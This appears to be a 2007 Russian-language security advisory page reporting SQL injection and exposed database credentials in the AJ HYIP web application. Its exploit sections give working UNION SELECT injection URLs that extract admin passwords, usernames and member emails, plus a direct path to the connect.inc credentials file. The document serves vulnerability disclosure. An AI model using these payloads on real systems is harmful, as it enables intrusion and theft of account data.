Computer Security

Security Advisory: SQL-инъекция, просмотр реквизитов доступа к БД в AJ HYIP
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] Orkut Server Side Session Management Error

  eNdonesia 8.4 [multiple injection sql]

  All Of the Mambo & Joomla Script Remote File Inclussion Bugs..

  [ MDKSA-2007:135 ] - Updated webmin packages fix XSS vulnerability

From:durito <durito_(at)_mail.ru>
Date:24.06.2007
Subject:SQL-инъекция, просмотр реквизитов доступа к БД в AJ HYIP

Здравствуйте, 3APA3A.

Software:   AJ HYIP
Vendor:  www.ajsquare.com
Vulnerability: SQL-инъекция, просмотр реквизитов доступа к БД
Risk:  высокий
Date:  23.06.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP:       durito.narod.ru
            www.damagelab.org
                        
+~~~:| Details |:

SQL-инъекция в скриптах topic_detail.php и show_email.php

+~~~:| Экплойт |:

http://www.target.com/forum/topic_detail.php?id=1%20UNION%20SELECT%20
1,2,3,admin_password,5,username,7,8%20From%20admin/*
http://www.target.com/forum/show_email.php?id=1%20UNION%20SELECT%201,
2,3,member_email,5,6,7,8%20From%20members/*

+~~~:| Details 2 |:

Просмотр реквизитов доступа к БД MySQL удаленным пользователем

+~~~:| Экплойт |:

http://www.target.com/forum/admin/connect.inc  

--
С уважением,
durito [NGH Group]                 mailto:durito@mail.ru
http://durito.narod.ru
http://ngh.void.ru

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server